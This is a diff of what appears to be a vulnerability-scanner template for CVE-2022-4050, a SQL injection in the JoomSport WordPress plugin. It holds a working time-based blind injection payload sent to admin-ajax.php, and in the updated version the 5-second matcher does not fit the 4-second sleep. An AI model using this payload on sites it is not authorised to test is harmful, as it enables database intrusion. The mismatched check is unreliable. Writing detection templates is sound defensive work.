diff --git a/cves/2022/CVE-2022-4050.yaml b/cves/2022/CVE-2022-4050.yaml index f18f0c41f9..12ac0b3770 100644 --- a/cves/2022/CVE-2022-4050.yaml +++ b/cves/2022/CVE-2022-4050.yaml @@ -11,28 +11,25 @@ info: - https://wordpress.org/plugins/joomsport-sports-league-results-management/ - https://nvd.nist.gov/vuln/detail/CVE-2022-4050 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 cve-id: CVE-2022-4050 - cwe-id: CWE-89 metadata: - verified: "true" - tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,joomsport-sports-league-results-management,unauth + verified: true + tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,joomsport-sports-league-results-management,unauth requests: - raw: - | - @timeout: 10s + @timeout: 15s POST /wp-admin/admin-ajax.php?action=joomsport_md_load HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - mdId=1&shattr={"id":"1+AND+(SELECT+1+FROM(SELECT+SLEEP(3))aaaa);--+-"} + mdId=1&shattr={"id":"1+AND+(SELECT+1+FROM(SELECT+SLEEP(4))aaaa);--+-"} matchers: - type: dsl dsl: - - 'duration>=3' + - 'duration>=5' - 'status_code == 200' - 'contains(content_type, "text/html")' - 'contains(body, "jscaruselcont jsview2")'